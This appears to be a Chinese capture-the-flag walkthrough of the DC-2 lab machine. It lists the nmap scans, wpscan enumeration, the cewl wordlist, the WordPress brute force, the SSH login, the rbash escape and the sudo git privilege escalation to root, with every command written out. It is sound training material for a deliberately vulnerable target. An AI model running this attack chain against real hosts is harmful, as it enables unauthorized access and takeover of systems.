实验环境
- Vmware workstation
- kali2020
- DC-2
- DC-2靶机网卡和kali是一样的
- kali 的ip地址:192.168.6.129
主机发现
第一种方法:使用VMware去查看DC-2靶机的MAC地址;第二种方法:直接进行主机发现。用命令扫描网段存活主机。
nmap -sP 192.168.6.0/24

发现靶机IP地址为:192.168.6.132
信息收集
端口扫描
命令1:nmap -A -T4 -p- 192.168.6.132
命令2:nmap -sV 192.168.6.132

开放了80和7744端口
访问一下,发现无法访问
修改攻击机的hosts文件,将以下内容写入
192.168.6.132 DC-2

发现还是不让我访问,我就修改了Windows下的hosts

然后就能访问了

发现flag1

有关键字cewl,字面意思大概就是要爆破出用户名和密码了
查看指纹信息,知道是wordpressCMS
利用wpscan扫一下用户名
wpscan --url http://dc-2/ -e u

将用户名存到文件

使用cewl生成密码
cewl -w pass.txt http://dc-2

攻击
爆破
wpscan --ignore-main-redirect --url 192.168.6.132 -U users.txt -P pass.txt --force
出来了

后台地址是在首页地址后加wp-login.php

用jerry登录发现flag2,tom页面没发现什么

尝试ssh远程登录
我们尝试用tom用户进行登录ssh服务,密码:parturient
用户:jerry,密码:adipiscing
命令:ssh tom@192.168.6.132 -p 7744
输入命令,发现受rbash的限

突破rbash
BASH_CMDS[a]=/bin/sh;a
/bin/bash

使用并添加环境变量
export PATH=$PATH:/bin/

他说在Jerry里,那我们切换

有点白痴,居然cd /了
说不是最终的flag,提示git
提权
sudo git -p help
!/bin/bash
即可登录root用户

去根目录找

结束。